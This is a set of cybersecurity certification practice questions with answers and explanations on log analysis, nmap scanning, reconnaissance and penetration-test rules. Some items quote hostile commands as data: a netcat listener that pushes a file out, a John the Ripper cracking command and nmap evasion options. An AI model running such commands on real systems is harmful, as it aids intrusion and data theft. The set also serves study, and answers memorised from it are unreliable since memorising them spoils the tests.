B. A back-off setting Explanation: This setting blocks all logins for 120 seconds when five failed attempts occur within 60 seconds. This can slow down brute-force hacking attempts, but Rick should recommend that the organization he is working with consider properly isolating the administrative interfaces via a protected network segment instead of just using a back-off algorithm, if they have not already.

Chris discovers the following entries in /var/log/auth.log. What is most likely occurring? A. A user has forgotten their password B. A brute force attack against the root account C. A misconfigured service D. A denial-of-service attack against the root account

B. A brute force attack against the root account Explanation: Repeated failures from the same host likely indicate a brute-force attack against the root account.

While reviewing Shodan scan data for his organization, Adam finds the following information. What type of system has he discovered? A. A botnet administration system B. A control and data acquisition system C. A noncaching web server D. A NAS

B. A control and data acquisition system Explanation: Adam has discovered a supervisory control and data acquisition (SCADA) system. Typically, BAS indicates that the system is used for building automation.

Angela is designing her organization's data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela's best design option? A. Administrative virtual machines run on administrator workstations B. A jump host C. A bastion host D. Use SSH or RDP from administrative workstations

B. A jump host Explanation: A jump host, or jump box, allows for easier logging of administrative access and can serve as an additional layer of protection between administrative workstations and the protected network. In this case, Angela's needs are best served by a jump host. Incorrect answers: C. A bastion host is fully exposed to attacks. A. Administrative virtual machines can be useful but don't make central auditing quite as easy and may allow a compromised virtual machine host to be a problem. D. Finally, direct SSH or RDP requires auditing of all administrative workstations and could allow a compromised workstation to cause issues by allowing it to directly connect to the secure network.

Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior? A. A firewall B. A NetFlow collector C. A honeypot D. A BGP monitor

B. A NetFlow collector Explanation: NetFlow records can be used to identify traffic patterns between systems that are atypical or that involve connections to systems that are known malware or malicious sites. Using his SIEM, Lucca can look for top talkers, behavior- or trend-based anomalies, or other correlations that point to an issue.

While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP. What should Janet report has occurred? [21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [21/Jul/2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [21/Jul/2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [21/Jul/2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 [21/Jul/2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0 A. A denial-of-service attack B. A vulnerability scan C. A port scan D. A directory traversal attack

B. A vulnerability scan Explanation: Testing for common sample and default files is a common tactic for vulnerability scanners. Janet can reasonably presume that her Apache web server was scanned using a vulnerability scanner.

Cassandra's nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown? A. A virtual machine B. A wireless router C. A broadband router D. A print server

B. A wireless router Explanation: Since Cassandra is scanning a wireless network and the system is using an IP address that is commonly used for commodity wireless routers, her best guess should be that this is a wireless router that can be accessed via SSH and that is providing a web management interface and print services. The OS fingerprinting that nmap provides is not always reliable; the VirtualBox match is a false positive in this case. The actual host scanned is an Asus router running open source firmware and additional software.

Senior management in Adam's company recently read a number of articles about massive ransomware attacks that successfully targeted organizations like the one that Adam is a part of. Adam's organization already uses layered security solutions including a border IPS, firewalls between network zones, local host firewalls, antivirus software, and a configuration management system that applies recommended operating system best practice settings to their workstations. What should Adam recommend to minimize the impact of a similar ransomware outbreak at his organization? A. Honeypots B. Backups C. Anti-malware software D. A next-generation firewall appliance

B. Backups Explanation: In many cases, backups are the best method to minimize the impact of a ransomware outbreak. While preventative measures can help, malware packages continue to change more quickly than detective controls like anti-malware software or NGFWs can react. A honeypot won't help Adam prevent ransomware, so it can be easily dismissed when answering this question.

While reviewing a malware sample, Adam discovers that code inside of it appears to be obfuscated. Which of the following encoding methods is commonly used to prevent code from being easily read by simply opening the file? A. QR coding B. Base64 C. Base128 D. XINT

B. Base64 Explanation: Malware often uses base64 encoding as part of its obfuscation attempts. There are multiple base64 formats, but online decoders can help quickly check to see whether the obfuscated code is just base64 encoded. Packers and other tools may use multiple methods, making it difficult to figure out quickly.

Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use? A. Fragmenting packets B. Changing packet header flags C. Spoofing the source IP D. Appending random data

B. Changing packet header flags Explanation: nmap supports quite a few firewall evasion techniques, including spoofing the MAC (hardware) address, appending random data, setting scan delays, using decoy IP addresses, spoofing the source IP or port, modifying the MTU size, and intentionally fragmenting packets.

As part of her reconnaissance process for her organization's internal security review, Olivia uses Shodan to search for hosts within her target's IP range. She discovers the following Shodan entry listing for one of her target's devices. What should she do with this information? "Cisco Configuration Professional is installed on this device. This feature requires the one-time use of the username "cisco" with the password "cisco". These default credentials have a privilege level of 15." A. Activate the incident response process B. Contact the device administrator C. Log in to validate the finding D. Nothing, because this is a false positive

B. Contact the device administrator Explanation: Olivia's first action should be to contact the device administrator. There is no indication that the device has been compromised, and logging in to validate the finding is not typically part of a reconnaissance process.

Greg configures his next-generation firewall security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains seeing a landing page that Greg controls, which advises them that they were prevented from visiting a malicious site. What is this technique known as? A. DNS masquerading B. DNS sinkholing C. DNS re-sequencing D. DNS hierarchy revision

B. DNS sinkholing Explanation: Greg's implementation is a form of DNS sinkholing that sends traffic to an alternate address, which acts as the sinkhole for traffic that would otherwise go to a known bad domain.

While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network? Date flow start | Duration | Proto | Src IP Addr:Port | Dst IP Addr:Port | Packets | Bytes | Flows 2017-07-11 13:06:46.343 | 21601804 | TCP | 10.1.1.1:1151 -> 10.2.2.3:443 | 9473640 | 9.1 G | 1 2017-07-11 13:06:46.551 | 21601804 | TCP | 10.2.2.3:443 -> 10.1.1.1:1151 | 8345101 | 514 M | 1 A. A web browsing session B. Data exfiltration C. Data infiltration D. A vulnerability scan

B. Data exfiltration Explanation: Large data flows leaving an organization's network may be a sign of data exfiltration by an advanced persistent threat. Using HTTPS to protect the data while making it look less suspicious is a common technique.

Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans? A. Height, weight, and eye color B. Date of birth, gender, and zip code C. Zodiac sign, gender, and zip code D. Age, height, and weight

B. Date of birth, gender, and zip code Explanation: Studies have shown that 87 percent of the US population can be uniquely identified by their date of birth, gender, and zip code. If Charles can obtain this information, he has a very high chance of identifying the right individual.

After Charles completes a topology discovery scan of his local network, he sees the Zenmap topology shown here. What can Charles determine from the Zenmap topology view? A. There are five hosts with port security enabled B. DemoHost2 is running a firewall C. DemoHost4 is running a firewall D. There are four hosts with vulnerabilities and seven hosts that do not have vulnerabilities

B. DemoHost2 is running a firewall Explanation: Zenmap topologies show a number of pieces of useful information. The icons next to DemoHost2 show the following information: a relative assessment of how many ports are open, with white showing "not scanned," green showing fewer than three open ports, yellow showing three to six open ports, and red showing more than six open ports. Next, it shows that a firewall is enabled. Finally, the lock icon shows that some ports are filtered. In this scan, only DemoHost2 has been identified by nmap as currently running a firewall, which doesn't mean that other hosts are not actually running firewalls.

Alice is conducting a penetration test of a client's system. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration test process is she currently in? A. Social engineering B. Discovery C. Analysis D. Social media profiling

B. Discovery Explanation: The NIST SP 800-115 guide describes four penetration testing phases: planning, discovery, attack, and reporting. Alice is conducting a discovery activity. During this phase she might also scan systems and networks, perform passive intelligence gathering, or use tools to gather additional information about her target.

What two phases of the NIST penetration testing cycle are often repeated during a test? A. Planning and discovery B. Discovery and attack C. Planning and attack D. Discovery and reporting

B. Discovery and attack Explanation: As attacks succeed, they will often create additional opportunities for discovery, resulting in more attacks. Planning the test itself, as well as the final reporting phase, should occur only once per penetration test.

While reviewing email logs for his domain's email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] This behavior continues for thousands of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered? A. Brute force B. Domain harvesting C. Domain probe D. Email list builder

B. Domain harvesting Explanation: This type of probe is known as domain harvesting and relies on message rejection error messages to help the individual running the probe determine which email accounts actually exist. Rick may want to disable delivery receipts, disable nondeliverable responses, or investigate more advanced techniques like false nondeliverable responses or recipient filtering and tar pitting.

Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization's staff. If she wants to review the metadata from the photos, what tool can she use to do so? A. Strings B. Exiftool C. Wireshark D. Stegdetect

B. Exiftool Explanation: Exiftool provides access to image and document metadata, including information about the camera, geotagging, time and date information, and a variety of other useful metadata if it is present. Incorrect answers: Strings is useful for pulling text from files but does not provide usefully formatted metadata. Wireshark is a packet capture utility, and stegdetect is used to detect steganographically concealed data in files.

Ian's company has an internal policy requiring that they perform regular port scans for all of their servers. Ian has been part of a recent effort to move his organization's servers to an infrastructure-as-a-service provider. What change will Ian most likely need to make to his scanning efforts? A. Change scanning software B. Follow the service provider's scan policies C. Sign a security contract with the provider D. Discontinue port scanning

B. Follow the service provider's scan policies Explanation: Most infrastructure-as-a-service providers will allow their customers to perform security scans as long as they follow the rules and policies around such scans. Ian should review his vendor's security documentation and contact them for details if he has questions.

The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization's management have expressed concerns about data remanence when Lauren's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern? A. Zero-wipe drives before moving systems B. Use full-disk encryption C. Use data masking D. Span multiple virtual disks to fragment data

B. Use full-disk encryption Explanation: Lauren's team should use full-disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. While many cloud providers have implemented technology to ensure that this won't happen, Lauren can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure. A. Using a zero wipe is often impossible because virtual environments may move without her team's intervention. C. Data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed. D. Spanning multiple virtual disks will still leave the data accessible, albeit possibly in fragmented form.

After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test? A. Port scan the target systems B. Get sign-off on the document C. Begin passive fingerprinting D. Notify law enforcement

B. Get sign-off on the document Explanation: While it may be tempting to start immediately after finishing scoping, Jessica's next step should be to ensure that she has appropriate sign-off and agreement to the scope, timing, and effort involved in the test.

Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool? A. Signature based B. Heuristic based C. Trend based D. Availability based

B. Heuristic based Explanation: Heuristic detection methods run the potential malware application and track what occurs. This can allow the anti-malware tool to determine whether the behaviors and actions of the program match those common to malware, even if the file does not match the fingerprint of known malware packages.

While gathering DNS information about an organization, Chris discovered multiple AAAA records. What type of reconnaissance does this mean Chris may want to consider? A. Second-level DNS queries B. IPv6 scans C. Cross-domain resolution D. A CNAME verification

B. IPv6 scans Explanation: AAAA records are IPv6 address records. This means that Chris may also want to scan for hosts that are available via IPv6 gateways. The rest of the answers here are made up for this question.

Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this? A. Use sha1sum to generate a hash for the file and write a script to check it periodically B. Install and use Tripwire C. Periodically check the MAC information for the file using a script D. Encrypt the file and keep the key secret so that the file cannot be modified

B. Install and use Tripwire Explanation: Tripwire and similar programs are designed to monitor a file for changes and to report on changes that occur. They rely on file fingerprints (hashes) and are designed to be reliable and scalable. Kathleen's best bet is to use a tool designed for the job, rather than to try to write her own.

Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire? A. Confidentiality B. Integrity C. Identification D. Availability

B. Integrity Explanation: The three objectives of cybersecurity are confidentiality, integrity, and availability. Hashing and the use of integrity monitoring tools like Tripwire are both techniques used to preserve integrity; in fact, file integrity monitoring tools typically use hashing to verify that files remain intact and unchanged.

While application vulnerability scanning one of her target organization's web servers, Andrea notices that the server's hostname is resolving to a cloudflare.com host. What does Andrea know about her scan? A. It is being treated like a DDoS attack B. It is scanning a CDN-hosted copy of the site C. It will not return useful information D. She cannot determine anything about the site based on this information

B. It is scanning a CDN-hosted copy of the site Explanation: CloudFlare, Akamai, and other content distribution networks use a network of distributed servers to serve information closer to requesters. In some cases, this may make parts of a vulnerability scan less useful, while others may remain valid. Here, Andrea simply knows that the content is hosted in a CDN and that she may not get all of the information she wants from the scan.

Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization's systems. Which of the following technologies should he recommend? A.Captive portals B.Multifactor authentication C.VPNs D.OAuth

B.Multifactor authentication Explanation: Multifactor authentication helps reduce the risk of a captured or stolen password by requiring more than one factor to authenticate. Attackers are less likely to have also stolen a token, code or biometric factor

Angela wants to gather detailed information about the hosts on a network passively. If she has access to a Wireshark pcap file from the network, which of the following tools can she use to provide automated analysis of the file? A.ettercap B.NetworkMiner C.Sharkbait D.dradis

B.NetworkMiner Explanation: Angela can use NetworkMiner, a tool that can analyze existing packet capture files to do OS identification and which identifies and marks images, files, credentials, sessions, DNS queries, parameters and a variety of other details. Ettercap can perform passive TCP stack fingerprinting but is primarily a man-in-the-middle tool. dradis is an open source collaboration platform for security teams. SharkBait is not a security tool or term

Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco provides. What type of documentation is this? A.Primary documentation B.OEM documentation C.Crowd-sourced documentation D.System documentation

B.OEM documentation Explanation: Original equipment manufacturer (OEM) documentation is provided by the builder or creator of the equipment, device, or software. It typically includes information about default and recommended settings. Most organizations use OEM- and expert-consensus-recommended configurations that have been modified to match the requirements of their environment

Allan's nmap scan includes a line that starts with cpe:/o. What type of information should he expect to gather from the entry? A.Common privilege escalation B.Operating system C.Certificate performance evaluation D.Hardware identification

B.Operating system Explanation: nmap provides both hardware and operating system identification capabilities as part of its common platform enumeration features. cpe:/o indicates operating system identification, and cpe:/h indicates hardware identification

Geoff's remote scans of a target organization's class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather additional reconnaissance information about the organization's network, which of the following scanning techniques is most likely to provide additional detail? A.Use a UDP scan B.Perform a scan from on-site C.Scan using the -p 1-65535 flag D.Use nmap's IPS evasion techniques

B.Perform a scan from on-site Explanation: Performing a scan from an on-site network connection is the most likely to provide more detail. Many organizations have a strong external network defense but typically provide fewer protections for on-site network connections to allow internal users to access services. It is possible that the organization uses services found only on less common ports or UDP-only services, but both of these options have a lower chance of being true than for an on-site scan to succeed. nmap does provide firewall and IPS evasion capabilities, but that is also a less likely scenario

Which of the following capabilities is not a typical part of an SIEM system? A.Alerting B.Performance management C.Data aggregation D.Log retention

B.Performance management

Charles received a pcap file from a system administrator at a remote site who was concerned about the traffic it showed. What type of behavior should Charles report after his analysis of the file? A.A DoS attack B.Port scanning C.A DDoS attack D.Service access issues

B.Port scanning Explanation: Charles should immediately notice that all traffic comes from one host (10.100.25.14) and is sent to the same host (10.100.18.12). All the traffic shown is TCP SYNs to well-known ports. Charles should quickly identify this as a SYN-based port scan

Lauren is a security analyst who has been tasked with performing nmap scans of her organization's network. She is a new hire and has been given this logical diagram of the organization's network but has not been provided with any additional detail. Lauren wants to determine what IP addresses to scan from location A. How can she find this information? A.Scan the organization's web server and then scan the other 255 IP addresses in its subnet B.Query DNS to find her organization's registered hosts C.Contact ICANN to request the data D.Use traceroute to identify the network that the organization's domain resides in

B.Query DNS to find her organization's registered hosts Explanation: Lauren's best option from this list is to query DNS using WHOIS. She might also choose to use a BGP looking glass, but most of the information she will need will be in WHOIS. If she simply scans the network the web server is in, she may end up scanning a third-party hosting provider, or other systems that aren't owned by her organization in the /24 subnet range. Incorrect answers: Contacting ICANN isn't necessary with access to WHOIS, and depending on what country Lauren is in, ICANN may not have the data she wants. Finally, using traceroute will only show the IP address of the system she queries; she needs more data to perform a useful scan in most instances

During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system? A.MySQL B.RDP C.TOR D.Jabber

B.RDP Explanation: Port 3389 is the service port for RDP. If Fred doesn't expect this port to be open on his point-of-sale terminals, he should immediately activate his incident response plan

After receiving a penetration test report, Rick has decided to implement anti-harvesting techniques for his organization's DNS. Which of the following sets of techniques is best suited to preventing bulk and automated information gathering? A.CAPTCHA and proxy services B.Rate limiting and CAPTCHA C.Not publishing TLD zone files and blacklisting D.CAPTCHA and blacklisting

B.Rate limiting and CAPTCHA Explanation: Both using CAPTCHAs to prevent bots and implementing a reasonable rate-limiting policy can limit the bulk collection of data. Privacy and proxy services help keep registrant data private. Blacklisting is useful to temporarily block abusive IP addresses or networks but can result in long-term issues if it is broadly used or if a legitimate site is blocked. Finally, not publishing TLD zone files can help limit WHOIS abuse, but not all TLDs can avoid doing so

The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment? A.Use a different scanning tool B.Rely on vendor testing and audits C.Engage a third-party tester D.Use a VPN to scan inside the vendor's security perimeter

B.Rely on vendor testing and audits Explanation: Most SaaS providers do not want their customers conducting port scans of their services, and many are glad to provide security assertions and attestations including audits, testing information, or contractual language that addresses potential security issues. Using a different scanning tool, engaging a third-party tester, or even using a VPN are not typically valid answers in a scenario like this

Which of the following items is not one of the three important rules that should be established before a penetration test? A.Timing B.Reporting C.Scope D.Authorization

B.Reporting Explanation: It is critical to determine when a penetration test will occur and what systems, networks, personnel, and other targets are part of the test and which are not. In addition, testers must have the proper permission to perform the test. The content and format of the summary are important but not critical to have in place before the penetration test occurs

Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing? A.Active hours B.Required reboots C.Automatic updates D.Network time synchronization

B.Required reboots Explanation: Windows 10 has quite a few built-in options for reboots after patches, but if users are logged in and a forced restart is not set via Group Policy, patches may not be installed for a very long time. Lauren should work with system administrators and user groups to ensure that a reasonable reboot policy can be put into place

Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job? A.Time-based B.Rule-based C.Role-based D.Location-based

B.Rule-based Explanation: NAC solutions that implement employee job function-based criteria often use time-based controls to ensure that employees have access only when they are supposed to be working, role-based criteria that grant access based on their duties, and location-based rules to ensure that they access networks only where they work. Rule-based criteria typically focus on system health and configuration, thus focusing more on the computer or software than on the user

Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods is best suited to performing this type of passive reconnaissance? A.Use the worldwide nmap database B.Search for his domain in Shodan C.Use the OpenVAS central vulnerability data repository D.Check against the CVE database for his domain

B.Search for his domain in Shodan Explanation: Of these answers, only Shodan provides a searchable listing of vulnerable hosts including details of the system that was scanned. Incorrect Answers: OpenVAS, CVE, and nmap do not provide central databases of vulnerable systems

Lauren inputs the following command on a Linux system: '#echo 127.0.0.1 example.com >> /etc/hosts' What has she done? A.She has added the system to the allowed hosts file B.She has routed traffic for the example.com domain to the local host C.She has routed local host traffic to example.com D.She has overwritten the hosts file and will have deleted all data except this entry

B.She has routed traffic for the example.com domain to the local host Explanation: Lauren has added an entry to the hosts file that routes all traffic for example.com to her local address. This is a useful technique to prevent a system from contacting a malicious host or domain or to simply prevent a nontechnical user from visiting specific sites or domains

Scott is part of the white team who is overseeing his organization's internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report? A.The blue team has succeeded B.The red team is violating rules of engagement C.The red team has succeeded D.The blue team is violating the rules of engagement

B.The red team is violating rules of engagement Explanation: This capture shows SQL injection attacks being attempted. Since this is the reconnaissance phase, the red team should not be actively attempting to exploit vulnerabilities and has violated the rules of engagement

What is a document that lists sensitive data-handling rules, contact information, black-box testing, and status meeting schedules called during a penetration test? A.The "get out of jail free" card B.The rules of engagement C.Executive sign-off D.A penetration test standard

B.The rules of engagement Explanation: The rules of engagement are the rules that a penetration test or other security assessment are conducted under. They typically list what type of assessment, when, where and how it will be conducted; what communication and notification will be done; and other details that are critical to ensure that the assessment is done in a way that meets the organization's needs

In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator's manager. At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What will most likely happen? A.The server administrator blocked the scanner with a firewall B.The server was patched C.The vulnerability plug-ins were updated and no longer report false positives D.The system was offline

B.The server was patched Explanation: The server is showing normal ports for a Windows file server. It is most likely that Frank's escalation to management resulted in action by the server administrator

While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: 'nc -l -p 43501 < example.zip' What has the user done? A.The user set up a reverse shell running as example.zip B.The user set up netcat as a listener to push example.zip C.The user set up a remote shell running as example.zip D.The user set up netcat to receive example.zip

B.The user set up netcat as a listener to push example.zip Explanation: The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.

Alice believes that one of her users may be taking malicious actions on the system she has access to. When she walks past her user's desktop, she sees the following commands on the screen: 'user12@workstation: /home/user12# ./john -wordlist:/home/user12/mylist.txt -format:lm hash.txt' What is the user attempting to do? A.They are attempting to hash a file B.They are attempting to crack hashed passwords C.They are attempting to crack encrypted passwords D.They are attempting a pass-the-hash attack

B.They are attempting to crack hashed passwords Explanation: Alice's suspicious user appears to be attempting to crack LANMAN hashes using a custom word list. The key clues here are the john application, the LM hash type, and the location of the word list

While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here: 0.0.0.0 symantec.com 0.0.0.0 mcafee.com 0.0.0.0 microsoft.com 0.0.0.0 kapersky.com Why would the malware make this change? A.To redirect 0.0.0.0 to known sites B.To prevent antivirus updates C.To prevent other attackers from compromising the system D.To enable remote access to the system

B.To prevent antivirus updates Explanation: Changing the hosts file has been used by various malware packages to prevent updates by stopping DNS resolution of the antivirus update server. Lauren should check to see whether the antivirus on the system is up-to-date but will probably need to recommend a rebuild or reinstallation of the system

Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, that are becoming more prevalent, and that are decreasing in occurrence. What type of analysis can she perform using this information? A.Anomaly B.Trend C.Heuristic D.Availability

B.Trend Explanation: Alice can use trend analysis to help her determine what attacks are most likely to target her organization and then take action based on the trends that are identified

Senior C-level executives at the organization that Alex works for have received targeted phishing messages that include a fake organizational login page link and a message that states that their passwords were inadvertently reset during a scheduled maintenance window. What type of attack should Alex describe in his after action report? A.Tuna phishing B.Whaling C.Spear phishing D.SAML phishing

B.Whaling Explanation: Whaling is a term used to specifically denote phishing attacks aimed at high-ranking officers of a company. Spear phishing describes phishing messages apparently sent by an individual or organization that the recipient is familiar with, and leverages trust in that organization. Neither tuna phishing nor SAML phishing is an industry term

Nathan has been asked to monitor and manage the environment in which a cybersecurity exercise is conducted. What team is he on? A.Red team B.White team C.Blue team D.Black team

B.White team Explanation: Nathan is part of the white team, which manages the environment. The red team attacks. The blue team defends. Black team is not a term that is commonly used in this context, but some organizations identify purple and green teams (often with varying descriptions for their responsibilities, which is admittedly confusing)

Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting? A.DNS record enumeration B.Zone transfer C.Reverse lookup D.Domain brute forcing

B.Zone transfer Explanation: If Chris can perform a zone transfer, he can gather all of the organization's DNS information, including domain servers, host names, MX and CNAME records, time to live records, zone serial number data, and other information. This is the easiest way to gather the most information about an organization via DNS if it is possible. Unfortunately for penetration testers (and attackers), few organizations allow untrusted systems to perform zone transfers

What services will the following nmap scan test for? 'nmap -sV -p 22,25,53,389 192.168.2.50/27' A.telnet, SMTP, DHCP, MS-SQL B.ssh, SMTP, DNS, LDAP C.telnet, SNMP, DNS, LDAP D.ssh, SNMP, DNS, RDP

B.ssh, SMTP, DNS, LDAP Explanation: This nmap scan will scan for ssh (22), SMTP (25), DNS (53) and LDAP (389) on their typical ports. If the services are running on an alternate port, this scan will completely miss those and any other services

What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop? A.ps B.top C.proc D.load

B.top Explanation: The top command will show a dynamic, real-time list of running processes. If Amanda runs this, she will immediately see that two processes are consuming 99 percent of a CPU each and can see the command that ran the program

Chris wants to determine what TCP ports are listening on a Windows system. What is his best option to determine this from the command line? A.Use arp -a B.Use netstat -ap C.Use nmap -t 127.0.0.1 D.There is not a Windows command to do this

B.Use netstat -ap Explanation: netstat can be used to list listening ports. The -a flag displays all listening ports. The -p flag will also show programs such as TIME_WAIT, ESTABLISHED, CLOSE_WAIT

Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?

C.

Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B? A.An IPS B.An IDS C.A HIPS D.A HIDS

C.A HIPS Explanation: When endpoints are connected without a network control point between them, a host-based solution is required. In this case, Lucca's specific requirement is to prevent attacks rather than simply detect them, meaning that a HIPS is required to meet his needs. Many modern products combine HIPS capabilities with other features such as data loss prevention and system compliance profiling, so Lucca may end up with additional useful capabilities if he selects a product with those features

Adam's port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess? A.A web server B.An FTP server C.A printer D.A proxy server

C.A printer Explanation: While the first three ports are common to many of the devices listed, TCP 515 is the LPR/LPD port, 631 is the IPP port commonly used by many print servers, and TCP 9100 is the RAW, or direct IP, port. While this could be another type of device, it is most likely a network-connected printer

Charles wants to use active techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria? A.Google searching B.Using a Shodan search C.Using DNS reverse lookup D.Querying a PGP key server

C.Using DNS reverse lookup Explanation: DNS reverse lookup is an active technique. DNS reverse lookup returns the hostname of an IP address. Incorrect answers: A.&B. Google and Shodan are both search engines. D.Querying a PGP key server does not interact with the target site and is considered passive reconnaissance. If you're not immediately familiar with a technique or technology, you can often reduce the possible options. Here, a Google search and querying a PGP server are obviously not active techniques, and Shodan also says it is a search, making a DNS reverse lookup a good guess, even if you're not familiar with it

While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time? A.Heuristic B.Behavior C.Availability D.Anomaly

C.Availability Explanation: Availability analysis targets whether a system or service is working as expected. While a SIEM may not have direct availability analysis capabilities, reporting on when logs and other data are not received from source systems can help detect outages. Ideally, Lucy's organization should be using system monitoring tools that can alarm on availability issues as well as common system problems such as memory, network, disk or CPU usage

nmap provides a standardized way to name hardware and software that it detects. What is this called? A.CVE B.HardwareEnum C.CPE D.GearScript

C.CPE Explanation: nmap's Common Platform Enumeration (CPE) is a standardized way to name applications, operating systems, and hardware. CPE output starts with cpe:/a for applications, /h for hardware, and /o for operating system

After a series of compromised accounts led to her domain being blacklisted, Lauren has been asked to restore her company's email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully? A.Migrate her company's SMTP servers to new IP addresses B.Migrate to a cloud email hosting provider C.Change SMTP headers to prevent blacklisting D.Work with the blacklisting organizations to get removed from the list

C.Change SMTP headers to prevent blacklisting Explanation: While some blacklists use entire IP ranges, changing IP addresses for SMTP servers is often a valid quick fix. Some organizations even discover that one server has been blacklisted and others in their cluster have not been. Migrating to a cloud provider or working with the blacklisting organizations can help, and online validation tools can help Lauren quickly check which lists her organization is on. Changing SMTP headers won't help

When Charleen attempts to visit a website, she receives a DNS response from the DNS cache server that her organization relies on that points to the wrong IP address. What attack has occurred? A.DNS brute forcing B.ARP spoofing C.DNS poisoning D.MAC spoofing

C.DNS poisoning Explanation: DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to alternate IP addresses. This may be intentional if the DNS server owner wants to ensure that specific sites are blocked, but it can also be leveraged by attackers who manage to either take control of the DNS server or who manage to spoof or modify DNS updates

While Greg was performing a port scan of a critical server system, the system administrators at his company observed the behavior shown here in their network management software suite. What action should Greg take after he is shown this chart? A.Increase the number of concurrent scans B.Decrease the number of ports scanned C.Decrease the number of concurrent scans D.Increase the number of ports scanned

C.Decrease the number of concurrent scans Explanation: Greg is seeing a significant increase in network latency for the host he is scanning, which could result in performance issues for users of the server. Greg needs to slow down his scan, which can be accomplished by reducing the number of concurrent scans

Frank is creating the scope worksheet for his organization's penetration test. Which of the following techniques is not typically included in a penetration test? A.Reverse engineering B.Social engineering C.Denial-of-service attacks D.Physical penetration attempts

C.Denial-of-service attacks Explanation: Denial-of-service attacks are rarely part of a penetration test because of the risk they create for the target organization. In specific cases where DoS attacks are permitted, they are sometimes aimed at a nonproduction instance or network to test DoS handling techniques

Angela captured the following packets during a reconnaissance effort run by her organization's red team. What type of information are they looking for? A.Vulnerable web applications B.SQL injection C.Directory traversal attacks D.Passwords

C.Directory traversal attacks Explanation: Angela has captured part of a Nikto scan that targets a vulnerable .asp script that allows directory traversal attacks. If it was successful, the contents of files like boot.ini or /etc/passwd would be accessible using the web server

